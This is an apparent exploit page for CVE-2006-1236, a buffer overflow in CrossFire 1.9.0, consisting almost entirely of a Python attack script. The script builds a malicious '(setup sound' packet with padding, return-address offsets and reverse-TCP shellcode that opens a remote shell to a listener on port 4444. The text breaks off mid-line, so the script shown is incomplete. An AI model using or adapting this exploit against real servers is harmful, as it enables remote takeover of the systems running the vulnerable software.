CVE-2006-1236_CrossFire_1.9.0緩衝區溢出漏洞

# CVE-2006-1236 CrossFire 1.9.0緩衝區溢出漏洞
==Exploit==

import socket
import struct

#Script by Wulfzz (Axua)

#offset to ret addr  = 4368
#offset to jmp ecx   = 4198

host = "127.0.0.1"
port = 13327

#linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444
shellcode = "\xbe\xc1\x25\xda\x2c\xdd\xc7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
shellcode +="\x12\x31\x72\x12\x83\xea\xfc\x03\xb3\x2b\x38\xd9\x02\xef\x4b"
shellcode +="\xc1\x37\x4c\xe7\x6c\xb5\xdb\xe6\xc1\xdf\x16\x68\xb2\x46\x19"
shellcode +="\x56\x78\xf8\x10\xd0\x7b\x90\xdd\x22\x7c\x61\x4a\x21\x7c\x70"
shellcode +="\xd6\xac\x9d\xc2\x80\xfe\x0c\x71\xfe\xfc\x27\x94\xcd\x83\x6a"
shellcode +="\x3e\xa0\xac\xf9\xd6\x54\x9c\xd2\x44\xcc\x6b\xcf\xda\x5d\xe5"
shellcode +="\xf1\x6a\x6a\x38\x71"

prefix= "\x11(setup sound "

padding_to_ecx = "\x41" * 4198
padding_to_ret = "\x41" * (170 - len(shellcode))

jmp_ecx = struct.pack("
                    